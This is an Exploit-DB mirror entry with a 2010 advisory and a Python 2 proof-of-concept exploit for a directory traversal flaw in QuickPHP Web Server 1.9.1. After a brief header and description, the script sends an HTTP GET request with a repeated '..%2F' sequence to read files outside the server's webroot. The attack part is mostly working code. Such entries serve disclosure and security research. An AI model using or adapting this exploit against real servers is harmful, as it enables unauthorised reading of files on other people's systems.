exploit-db-mirror/exploits/windows/remote/15862.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

53 lines
No EOL
1.1 KiB
Text

# ------------------------------------------------------------------------
# Software................QuickPHP Web Server 1.9.1
# Vulnerability...........Directory Traversal
# Download................http://www.zachsaw.co.cc/?pg=quickphp_php_tester_debugger
# Release Date............12/27/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A directory traversal vulnerability in QuickPHP Web Server 1.9.1 can
# be exploited to read files outside of the webroot directory.
#
#
# --Exploit--
#
# The resource path must be absolute.
#
# ..%2F
#
#
# --PoC--
import socket
host = 'localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET http://' + host + '/' + '..%2F' * 8 + ' HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n');
print s.recv(8192);